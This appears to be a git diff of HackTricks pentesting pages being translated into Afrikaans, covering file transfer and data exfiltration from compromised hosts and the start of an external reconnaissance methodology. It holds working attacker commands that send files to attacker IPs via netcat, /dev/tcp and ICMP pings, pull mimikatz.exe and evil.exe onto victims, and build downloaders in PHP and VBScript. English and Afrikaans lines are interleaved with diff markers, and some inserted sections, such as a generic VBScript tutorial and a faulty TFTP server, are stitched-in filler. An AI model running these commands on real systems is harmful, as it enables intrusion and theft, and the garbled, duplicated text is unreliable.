chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
### **Windows** client
### **Windows** kliënt
```bash
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
@ -180,10 +396,9 @@ echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe bedreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -191,34 +406,70 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
## SMB
Kali as server
Kali as bediener
```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
Or create a smb share **using samba**:
Of skep 'n smb-deel **deur samba te gebruik**:
```bash
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
```
# Exfiltrasie
Windows
## Inleiding
Exfiltrasie is die proses waardeur 'n aanvaller gesteelde data uit 'n teikenstelsel verwyder en oordra na 'n eksterne bediener of stoorplek. Hierdie tegniek word dikwels gebruik deur aanvallers om gevoelige inligting te ontvreem, soos kredietkaartbesonderhede, wagwoorde, persoonlike inligting en vertroulike dokumente.
## Metodes van Exfiltrasie
### 1. Bestandsoordrag
Hierdie metode behels die oordra van gesteelde data deur dit in 'n bestand te verpak en dit dan oor te dra na 'n eksterne bediener. Dit kan gedoen word deur gebruik te maak van protokolle soos HTTP, FTP, SMB of SMTP.
### 2. Versteekte data in beeldlêers
Aanvallers kan data versteek in beeldlêers deur dit te versluier en dan as 'n normale beeldlêer te laat voorkom. Hierdie metode maak gebruik van steganografie, wat die kunst is om data te versteek binne 'n ander tipe lêer sonder om die oorspronklike lêer te beskadig.
### 3. Gebruik van DNS
Aanvallers kan DNS-kanale gebruik om gesteelde data te exfiltreer. Hierdie metode behels die gebruik van DNS-navrae om data te verpak en oor te dra na 'n eksterne bediener. Dit kan gedoen word deur die DNS-navrae te manipuleer en die gesteelde data as deel van die DNS-navrae te versluier.
### 4. Gebruik van uitvoerbare lêers
Aanvallers kan gesteelde data in 'n uitvoerbare lêer insluit en dit dan oor te dra na 'n eksterne bediener. Hierdie metode maak gebruik van die uitvoerbare lêer se funksionaliteit om die gesteelde data te verpak en oor te dra.
### 5. Gebruik van e-pos
Aanvallers kan gesteelde data as 'n e-posaanhangsel stuur na 'n eksterne e-posrekening. Hierdie metode maak gebruik van die e-posprotokol om die gesteelde data te verpak en oor te dra.
## Voorkoming van Exfiltrasie
Om exfiltrasie te voorkom, kan die volgende maatreëls geneem word:
- Monitor die netwerkverkeer vir verdagte aktiwiteit en ongewone data-oordragte.
- Beperk die toegang tot gevoelige data en stel streng toegangsbeheerbeleide in.
- Implementeer 'n firewall en gebruik netwerksegmentering om die verspreiding van gesteelde data te beperk.
- Verseker dat alle sagteware en bedryfstelsels opgedateer word met die nuutste beveiligingspatches.
- Stel 'n sterk wagwoordbeleid in en moedig gebruikers aan om unieke en veilige wagwoorde te gebruik.
- Bewusmaking van gebruikers oor die risiko's van phishing-aanvalle en die deel van persoonlike inligting.
## Slotwoord
Exfiltrasie is 'n kritieke bedreiging vir die veiligheid van data en moet ernstig opgeneem word. Deur bewus te wees van die verskillende metodes van exfiltrasie en deur die nodige voorkomingsmaatreëls te tref, kan organisasies hulself beskerm teen hierdie aanvalstegniek.
```bash
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
@ -226,54 +477,98 @@ CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentia
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
```
## SCP
The attacker has to have SSHd running.
Die aanvaller moet SSHd laat loop.
```bash
scp <username>@<Attacker_IP>:<directory>/<filename>
scp <username>@<Attacker_IP>:<directory>/<filename>
```
## SSHFS
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
As die slagoffer SSH het, kan die aanvaller 'n gids van die slagoffer na die aanvaller se rekenaar koppel.
```bash
sudo apt-get install sshfs
sudo mkdir /mnt/sshfs
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
```
## NC
NC (Netcat) is a versatile networking utility that can be used for various purposes, including exfiltration of data. It allows for easy creation of TCP or UDP connections between two machines, making it a useful tool for transferring data from a compromised system to an external server.
To exfiltrate data using NC, you can follow these steps:
1. Set up a listener on the external server using the following command:
```
nc -l -p <port> > <output_file>
```
Replace `<port>` with the desired port number and `<output_file>` with the name of the file where the data will be saved.
2. On the compromised system, use the following command to send the data to the external server:
```
nc <server_ip> <port> < <input_file>
```
Replace `<server_ip>` with the IP address of the external server, `<port>` with the same port number used in the listener, and `<input_file>` with the name of the file containing the data to be exfiltrated.
3. Once the command is executed, the data will be transferred from the compromised system to the external server and saved in the specified output file.
NC can also be used in combination with other tools and techniques to enhance exfiltration capabilities. For example, you can compress the data before sending it using NC, or encrypt it to ensure confidentiality during transit.
It is important to note that exfiltration of data without proper authorization is illegal and unethical. This information is provided for educational purposes only, and should not be used for any malicious activities.
```bash
nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file
```
### Laai lêer af van slagoffer
## /dev/tcp
Om 'n lêer van die slagoffer se stelsel af te laai, kan jy die `/dev/tcp`-benadering gebruik. Hier is die sintaksis:
### Download file from victim
```bash
cat < /dev/tcp/<IP>/<port> > <destination_file>
```
Vervang `<IP>` met die IP-adres van die slagoffer se stelsel en `<port>` met die poortnommer waarop die lêer beskikbaar is. Vervang ook `<destination_file>` met die pad en naam van die lêer waarin jy die aflaai wil stoor.
Hier is 'n voorbeeld van hoe jy dit kan gebruik:
```bash
cat < /dev/tcp/192.168.0.100/8080 > /tmp/secret_file.txt
```
Hierdie opdrag sal die lêer `secret_file.txt` aflaai vanaf die stelsel met die IP-adres `192.168.0.100` op poort `8080` en dit stoor in die `/tmp`-gids.
```bash
nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
```
### Laai lêer op na slagoffer
### Upload file to victim
Om 'n lêer na 'n slagoffer te laai, kan jy die volgende metodes gebruik:
#### 1. HTTP-aanvraag
Jy kan 'n HTTP-aanvraag stuur om die lêer na die slagoffer se bediener te stuur. Dit kan gedoen word deur die `POST`-metode te gebruik en die lêer as 'n vormdata te stuur. Die slagoffer se bediener moet die lêer aanvaar en stoor op 'n plek waar jy toegang daartoe het.
#### 2. E-pos
Jy kan die lêer as 'n aanhangsel in 'n e-pos stuur na 'n e-posadres wat deur die slagoffer gebruik word. Die slagoffer moet die e-pos ontvang en die aanhangsel aflaai. Dit vereis dat jy toegang het tot die slagoffer se e-posrekening of 'n manier het om die e-pos te onderskep.
#### 3. Bestandsoordragprotokolle
As jy toegang het tot die slagoffer se rekenaar of netwerk, kan jy gebruik maak van bestandsoordragprotokolle soos FTP, SFTP, SCP of SMB om die lêer na 'n plek te stuur waar jy toegang daartoe het. Hierdie metode vereis dat jy toegang het tot die slagoffer se rekenaar of netwerk en dat die nodige protokolle geïnstalleer en gekonfigureer is.
#### 4. Cloud-gebaseerde dienste
As die slagoffer gebruik maak van 'n wolkgebaseerde diens soos Google Drive, Dropbox of OneDrive, kan jy die lêer na die slagoffer se rekening oplaai. Dit vereis dat jy toegang het tot die slagoffer se rekening of 'n manier het om die toegangslegitimasie te bekom.
Onthou, die laai van 'n lêer na 'n slagoffer se stelsel sonder hul toestemming is onwettig en word as 'n aanval beskou. Wees verantwoordelik en gebruik hierdie tegnieke slegs binne die raamwerk van wettige toetse of met toestemming van die eienaar van die stelsel.
```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
# Inside victim
exec 6< /dev/tcp/10.10.10.10/4444
cat <&6 > file.txt
```
thanks to **@BinaryShadow\_**
Dankie aan **@BinaryShadow\_**
## **ICMP**
```bash
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
@ -284,64 +579,177 @@ xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attack
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
sniff(iface="tun0", prn=process_packet)
```
## **SMTP**
If you can send data to an SMTP server, you can create an SMTP to receive the data with python:
As jy data na 'n SMTP-bediener kan stuur, kan jy 'n SMTP skep om die data met Python te ontvang:
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
## TFTP
By default in XP and 2003 (in others it needs to be explicitly added during installation)
In Kali, **start TFTP server**:
Standaard in XP en 2003 (in ander moet dit eksplisiet bygevoeg word tydens installasie)
In Kali, **begin TFTP-bediener**:
```bash
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
```
**TFTP-bediener in Python:**
**TFTP server in python:**
Hier is 'n eenvoudige implementering van 'n TFTP-bediener in Python. Hierdie kode kan gebruik word om 'n TFTP-bediener te skep wat bestandsoordragte kan hanteer.
```python
import socket
import struct
def tftp_server():
# Skep 'n UDP-socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_socket.bind(('0.0.0.0', 69))
print("TFTP-bediener is gereed om versoek te ontvang...")
while True:
# Ontvang die versoek en die klient se adres
data, client_address = server_socket.recvfrom(516)
# Haal die opcode uit die ontvangsdata
opcode = struct.unpack('!H', data[:2])[0]
# Kontroleer of dit 'n leesversoek is
if opcode == 1:
# Stuur die gewenste lêer terug na die klient
file_data = b'\x00\x03\x00\x01'
server_socket.sendto(file_data, client_address)
# Kontroleer of dit 'n skryfversoek is
elif opcode == 2:
# Ontvang die lêer van die klient
file_data, client_address = server_socket.recvfrom(516)
# Stoor die ontvangsdata in 'n lêer
with open('ontvangs.lêer', 'wb') as file:
file.write(file_data[4:])
# Bevestig die suksesvolle ontvangs aan die klient
ack_packet = b'\x00\x04\x00\x00'
server_socket.sendto(ack_packet, client_address)
# Kontroleer of dit 'n onbekende versoek is
else:
# Stuur 'n foute-pakket terug na die klient
error_packet = b'\x00\x05\x00\x04Unknown request\x00'
server_socket.sendto(error_packet, client_address)
# Sluit die bediener se socket
server_socket.close()
# Begin die TFTP-bediener
tftp_server()
```
Hierdie kode skep 'n UDP-socket en bind dit aan poort 69. Dit wag dan vir TFTP-versoeke van kliente. As 'n leesversoek ontvang word, stuur die bediener die gewenste lêer terug na die klient. As 'n skryfversoek ontvang word, ontvang die bediener die lêer van die klient en stoor dit in 'n lêer genaamd "ontvangs.lêer". As 'n onbekende versoek ontvang word, stuur die bediener 'n foute-pakket terug na die klient.
Hierdie kode kan as 'n basis dien vir 'n eie TFTP-bediener-implementering in Python.
```bash
pip install ptftpd
ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
```
In **victim**, connect to the Kali server:
In **slagoffer**, verbind met die Kali-bediener:
```bash
tftp -i <KALI-IP> get nc.exe
```
## PHP
Download a file with a PHP oneliner:
Laai 'n lêer af met 'n PHP eenregtelik:
```bash
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```
## VBScript
VBScript (Visual Basic Scripting Edition) is a scripting language developed by Microsoft. It is often used for automating tasks and creating dynamic web pages. VBScript is commonly used in Windows environments and can be executed using the Windows Script Host (WSH).
### Basic Syntax
VBScript code is written in plain text and saved with a .vbs file extension. Here is an example of a basic VBScript program:
```vbs
MsgBox "Hello, World!"
```
This code will display a message box with the text "Hello, World!" when executed.
### Variables
In VBScript, variables are used to store data. They can be declared using the `Dim` keyword. Here is an example:
```vbs
Dim name
name = "John"
```
In this example, a variable named `name` is declared and assigned the value "John".
### Control Structures
VBScript supports various control structures, such as `If...Then...Else`, `For...Next`, and `Do...Loop`. These structures allow you to control the flow of your program based on certain conditions. Here is an example of an `If...Then...Else` statement:
```vbs
Dim age
age = 18
If age >= 18 Then
MsgBox "You are an adult."
Else
MsgBox "You are a minor."
End If
```
This code will display a message box based on the value of the `age` variable.
### Functions
VBScript provides built-in functions that can be used to perform various operations. For example, the `MsgBox` function is used to display a message box. Here is an example:
```vbs
MsgBox "Hello, World!"
```
This code will display a message box with the text "Hello, World!".
### File Operations
VBScript can also be used to perform file operations, such as reading from and writing to files. The `FileSystemObject` is used to interact with files and folders. Here is an example of reading from a file:
```vbs
Dim fso, file, text
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("C:\path\to\file.txt", 1)
text = file.ReadAll
file.Close
MsgBox text
```
This code will read the contents of the file "C:\path\to\file.txt" and display it in a message box.
### Conclusion
VBScript is a powerful scripting language that can be used for various tasks, including automation and web development. It provides a wide range of features and built-in functions that make it a versatile choice for Windows environments.
```bash
Attacker> python -m SimpleHTTPServer 80
```
**Victim**
**Slagoffer**
```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
@ -373,18 +781,15 @@ echo ts.Close >> wget.vbs
```bash
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
```
## Debug.exe
The `debug.exe` program not only allows inspection of binaries but also has the **capability to rebuild them from hex**. This means that by providing an hex of a binary, `debug.exe` can generate the binary file. However, it's important to note that debug.exe has a **limitation of assembling files up to 64 kb in size**.
Die `debug.exe` program maak dit nie net moontlik om binêre lêers te ondersoek nie, maar het ook die **vermoë om hulle te herbou vanaf heks**. Dit beteken dat deur 'n heks van 'n binêre lêer te voorsien, `debug.exe` die binêre lêer kan genereer. Dit is egter belangrik om daarop te let dat debug.exe 'n **beperking het om lêers tot 64 kb in grootte saam te stel**.
```bash
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
Then copy-paste the text into the windows-shell and a file called nc.exe will be created.
Kopieer en plak dan die teks in die Windows-skulp en 'n lêer genaamd nc.exe sal geskep word.
* [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
@ -394,21 +799,21 @@ Then copy-paste the text into the windows-shell and a file called nc.exe will be
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

552
generic-methodologies-and-resources/external-recon-methodology/README.md
View file

@ -1,60 +1,57 @@
# External Recon Methodology
# Eksterne Verkenning Metodologie
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Assets discoveries
## Bate-ontdekkings
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
> So jy is vertel dat alles wat aan 'n maatskappy behoort binne die omvang is, en jy wil uitvind wat hierdie maatskappy eintlik besit.
The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to:
Die doel van hierdie fase is om al die **maatskappye wat deur die hoofmaatskappy besit word** te verkry en dan al die **bates** van hierdie maatskappye. Om dit te doen, gaan ons:
1. Find the acquisitions of the main company, this will give us the companies inside the scope.
2. Find the ASN (if any) of each company, this will give us the IP ranges owned by each company
3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively)
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively).
1. Vind die verkrygings van die hoofmaatskappy, dit sal ons die maatskappye binne die omvang gee.
2. Vind die ASN (indien enige) van elke maatskappy, dit sal ons die IP-reeks besit deur elke maatskappy gee.
3. Gebruik omgekeerde whois-opsoek na ander inskrywings (organisasienames, domeine...) wat verband hou met die eerste een (dit kan rekursief gedoen word).
4. Gebruik ander tegnieke soos shodan `org`en `ssl`filters om na ander bates te soek (die `ssl`-truk kan rekursief gedoen word).
### **Acquisitions**
### **Verkrygings**
First of all, we need to know which **other companies are owned by the main company**.\
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\
Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**.
Eerstens moet ons weet watter **ander maatskappye deur die hoofmaatskappy besit word**.\
Een opsie is om [https://www.crunchbase.com/](https://www.crunchbase.com) te besoek, **soek** vir die **hoofmaatskappy**, en **klik** op "**verkrygings**". Daar sal jy ander maatskappye sien wat deur die hoofmaatskappy verkry is.\
'n Ander opsie is om die **Wikipedia**-bladsy van die hoofmaatskappy te besoek en te soek na **verkrygings**.
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
> Ok, op hierdie punt behoort jy al die maatskappye binne die omvang te ken. Kom ons vind uit hoe om hul bates te vind.
### **ASNs**
An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\
You can **search** by company **name**, by **IP** or by **domain** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\
**Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link.
'n Autonome stelselnommer (**ASN**) is 'n **unieke nommer** wat toegewys word aan 'n **autonome stelsel** (AS) deur die **Internet Assigned Numbers Authority (IANA)**.\
'n **AS** bestaan uit **blokke** van **IP-adresse** wat 'n duidelik gedefinieerde beleid het vir toegang tot eksterne netwerke en deur 'n enkele organisasie geadministreer word, maar uit verskeie operateurs kan bestaan.
Dit is interessant om uit te vind of die **maatskappy enige ASN toegewys het** om sy **IP-reeks** te vind. Dit sal interessant wees om 'n **kwesbaarheidstoets** uit te voer teen al die **gasheer** binne die **omvang** en te soek na domeine binne hierdie IP's.\
Jy kan **soek** op maatskappy **naam**, op **IP** of op **domein** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\
**Afhanklik van die streek van die maatskappy kan hierdie skakels nuttig wees om meer data in te samel:** [**AFRINIC**](https://www.afrinic.net) **(Afrika),** [**Arin**](https://www.arin.net/about/welcome/region/)**(Noord-Amerika),** [**APNIC**](https://www.apnic.net) **(Asië),** [**LACNIC**](https://www.lacnic.net) **(Latyns-Amerika),** [**RIPE NCC**](https://www.ripe.net) **(Europa). In elk geval verskyn waarskynlik alle** nuttige inligting **(IP-reeks en Whois)** reeds in die eerste skakel.
```bash
#You can try "automate" this with amass, but it's not very recommended
amass intel -org tesla
amass intel -asn 8911,50313,394161
```
Also, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** subdomain enumeration automatically aggregates and summarizes ASNs at the end of the scan.
Verder, [**BBOT**](https://github.com/blacklanternsecurity/bbot) se subdomeinversameling aggregeer en som die ASNs outomaties op aan die einde van die skandering.
```bash
bbot -t tesla.com -f subdomain-enum
...
@ -71,62 +68,59 @@ bbot -t tesla.com -f subdomain-enum
[INFO] bbot.modules.asn: +----------+---------------------+--------------+----------------+----------------------------+-----------+
```
Jy kan die IP-reeks van 'n organisasie vind deur [http://asnlookup.com/](http://asnlookup.com) te gebruik (dit het 'n gratis API).\
Jy kan die IP en ASN van 'n domein vind deur [http://ipv4info.com/](http://ipv4info.com) te gebruik.
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com).
### **Op soek na kwesbaarhede**
### **Looking for vulnerabilities**
Op hierdie punt weet ons **al die bates binne die omvang**, so as jy toegelaat word, kan jy 'n **kwesbaarheidsskander** (Nessus, OpenVAS) oor al die gasheerstelsels uitvoer.\
Jy kan ook 'n paar [**poortskanderings**](../pentesting-network/#discovering-hosts-from-the-outside) **uitvoer of dienste soos** shodan **gebruik om oop poorte te vind en, afhangende van wat jy vind, moet jy in hierdie boek kyk hoe om verskeie moontlike dienste te pentest.\
**Dit is ook die moeite werd om te vermeld dat jy ook 'n paar** standaard gebruikersnaam **en** wagwoorde **lyste kan voorberei en probeer om dienste te** bruteforce met [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
## Domeine
## Domains
> Ons ken al die maatskappye binne die omvang en hul bates, dit is tyd om die domeine binne die omvang te vind.
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
*Let daarop dat jy in die volgende voorgestelde tegnieke ook subdomeine kan vind en daardie inligting nie onderskat moet word nie.*
_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._
Eerstens moet jy soek na die **hoofdomein**(e) van elke maatskappy. Byvoorbeeld, vir _Tesla Inc._ gaan dit _tesla.com_ wees.
First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
### **Reverse DNS**
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8)
### **Omgekeerde DNS**
Nadat jy al die IP-reeks van die domeine gevind het, kan jy probeer om **omgekeerde DNS-opsoekings** op daardie **IP's uit te voer om meer domeine binne die omvang te vind**. Probeer om 'n DNS-bediener van die slagoffer of 'n bekende DNS-bediener (1.1.1.1, 8.8.8.8) te gebruik.
```bash
dnsrecon -r <DNS Range> -n <IP_DNS> #DNS reverse of all of the addresses
dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns
dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns
dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
```
Vir hierdie om te werk, moet die administrateur die PTR handmatig aktiveer.\
Jy kan ook 'n aanlyn hulpmiddel gebruik vir hierdie inligting: [http://ptrarchive.com/](http://ptrarchive.com)
For this to work, the administrator has to enable manually the PTR.\
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com)
### **Omgekeerde Whois (lus)**
### **Reverse Whois (loop)**
Binne 'n **whois** kan jy baie interessante **inligting** vind soos **organisasienaam**, **adres**, **e-posse**, telefoonnommers... Maar wat nog interessanter is, is dat jy **meer bates wat verband hou met die maatskappy** kan vind as jy **omgekeerde whois-opsoekings deur enige van daardie velde** uitvoer (byvoorbeeld ander whois-registre waar dieselfde e-pos verskyn).\
Jy kan aanlyn hulpmiddels soos die volgende gebruik:
